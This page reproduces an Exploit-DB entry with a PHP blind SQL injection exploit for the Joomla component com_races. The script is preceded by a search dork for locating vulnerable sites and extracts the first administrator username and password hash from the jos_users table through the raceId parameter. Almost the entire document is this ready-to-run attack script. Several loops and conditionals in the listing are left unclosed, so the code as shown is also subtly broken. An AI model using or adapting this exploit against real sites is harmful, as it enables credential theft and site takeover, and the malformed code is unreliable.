Joomla! Component com_races – Blind SQL Injection - 体验盒子

作者： DevilZ TM

日期： 2010-03-13

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11710/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

#!/usr/bin/php

<?php

ini_set("max_execution_time",0);

print_r('

######################################################################

#[x]Dork:inurl:index.php?option=com_races "raceId"

#[x]Joomla com_races (raceId) Blind SQL Injection Exploit

#[x] Usage: Cristal.php "http://url/index.php?option=com_races&task=result&raceId=272

#####################################################################

');

if ($argc > 1) {

$url = $argv[1];

$r = strlen(file_get_contents($url."+and+1=1--"));

echo "\nExploiting:\n";

$w = strlen(file_get_contents($url."+and+1=0--"));

$t = abs((100-($w/$r*100)));

echo "Username: ";

for ($i=1; $i <= 30; $i++) {

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

for ($j = 1; $j < $count; $j++) {

for ($i = 46; $i <= 122; $i=$i+2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

echo "\nPassword: ";

for ($j = 1; $j <= 49; $j++) {

for ($i = 46; $i <= 102; $i=$i+2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

?>